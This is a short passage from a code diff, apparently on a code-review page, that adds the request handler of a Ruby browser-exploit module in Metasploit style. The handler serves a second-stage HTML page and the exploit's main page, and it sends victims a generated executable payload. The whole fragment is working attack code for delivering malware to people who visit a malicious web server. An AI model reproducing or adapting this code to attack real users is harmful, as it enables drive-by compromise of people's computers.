+        send_response(cli, @localserver, { 'Content-Type' => 'application/x-msdownload', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
481
+      elsif request.uri =~ /.*#{pm}.*$/
482
+        rq = "#{get_resource.chomp('/')}"
483
+        gm = stage2_html(rq)
484
+        send_response(cli, gm, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
485
+      elsif request.uri =~ /.*#{@payload_uri}$/
486
+        return if ((payload = regenerate_payload(cli)) == nil)
487
+        print_status("Sending payload ...")
488
+        send_response(cli, generate_payload_exe({ :code => payload.encoded }), { 'Content-Type' => 'application/octet-stream', 'Connection' => 'close' })
489
+      else
490
+        print_status("Sending main page ..")
491
+        send_response(cli, exploit_html(request.uri))
492
+      end
493
+  end
494
+
495
+end
496
+

Loading…
Cancel
Save